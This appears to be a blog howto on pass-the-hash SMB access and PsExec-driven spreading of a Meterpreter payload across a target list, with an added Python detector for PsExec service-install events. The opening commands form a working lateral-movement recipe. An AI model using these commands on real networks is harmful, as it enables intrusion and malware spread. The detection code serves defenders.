
Aug 20, 2013

Howto: Dropping Shell And PSexec

smbclient //192.168.1.120/c$ -U Administrator -p 4ECC0E7568976B7EAAD3B435B51404EE:551E3B3215FFD87F5E037B3E3523D5F6
meterpreter > upload /my/local/path/to/metr.exe \\users\\MrClickHappy\\metr.exe
meterpreter > upload /my/local/path/to/PsExec.exe \\users\\MrClickHappy\\PsExec.exe
meterpreter > upload /my/local/path/to/targets.txt \\users\\MrClickHappy\\targets.txt
meterpreter > shell
Process 3052 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\MrClickHappy> PsExec.exe @targets.txt -accepteula -c -f -h -d metr.exe

This command uses the existing user's credentials to copy the Meterpreter payload to the remote system (-c), overwrite the file if it already exists (-f), run it with elevated permissions (-h), return without waiting for the process to terminate (-d), and suppress the EULA prompt (-accepteula). Because a list of targets was supplied (@targets.txt), the command keeps going through the list and eventually finds a winner.
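From the defender's side, as an added example that is not code from the original post: every target the command above reaches installs a PsExec service (PSEXESVC by default, renamed with -r) whose binary is dropped straight into the Windows root through ADMIN$, and -c places the payload the same way, so the run shows up as service-install events. The detector below flags those in constructed System 7045 / Security 4697 records, including a renamed service; the event field names and sample records are assumptions of this example.

```python
"""Detector for PsExec-style service installs (added example, not from the
original post).  Every PsExec run registers a service (PSEXESVC by default,
renamed with -r) whose binary sits directly in the target's Windows root,
reached through the ADMIN$ share; -c drops the payload the same way.
Event field names below are an assumption of this example."""
import re
from dataclasses import dataclass

PSEXEC_SERVICE = re.compile(r"^psexesvc$", re.IGNORECASE)
# A service binary dropped straight into the Windows root or ADMIN$ share,
# not a subdirectory such as System32 where legitimate services normally live.
ROOT_DROP = re.compile(
    r"^(?:%SystemRoot%|C:\\Windows|\\\\[^\\]+\\ADMIN\$)\\[^\\]+\.exe$",
    re.IGNORECASE)

# Constructed sample records: System 7045 / Security 4697 service installs.
SAMPLE_EVENTS = [
    {"EventID": 7045, "Host": "WS-01", "ServiceName": "PSEXESVC",
     "ImagePath": r"%SystemRoot%\PSEXESVC.exe"},
    {"EventID": 7045, "Host": "WS-01", "ServiceName": "Spooler",
     "ImagePath": r"C:\Windows\System32\spoolsv.exe"},
    {"EventID": 4697, "Host": "WS-02", "ServiceName": "rsvc-1a2b",
     "ImagePath": r"%SystemRoot%\rsvc-1a2b.exe"},   # PsExec -r renamed service
    {"EventID": 4624, "Host": "WS-02", "ServiceName": "",
     "ImagePath": ""},                              # logon, not a service install
]

@dataclass
class Finding:
    host: str
    service: str
    image: str
    reason: str

def detect_psexec(events):
    """Return one Finding per service-install event that looks like PsExec."""
    findings = []
    for ev in events:
        if ev["EventID"] not in (7045, 4697):
            continue
        name, image = ev["ServiceName"], ev["ImagePath"].strip('"')
        if PSEXEC_SERVICE.match(name):
            findings.append(Finding(ev["Host"], name, image, "PSEXESVC service installed"))
        elif ROOT_DROP.match(image):
            findings.append(Finding(ev["Host"], name, image, "service binary in Windows root"))
    return findings

if __name__ == "__main__":
    for f in detect_psexec(SAMPLE_EVENTS):
        print(f"{f.host}: {f.service} ({f.image}) -> {f.reason}")
```

The root-directory heuristic also catches PsExec clones that rename the service but still stage their binary through ADMIN$.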


Sources:
http://pen-testing.sans.org/blog/pen-testing/2013/08/08/psexec-uac-bypass
https://www.christophertruncer.com/dropping-payloads-with-credentials
http://www.ampliasecurity.com/research/wce12_uba_ampliasecurity_eng.pdf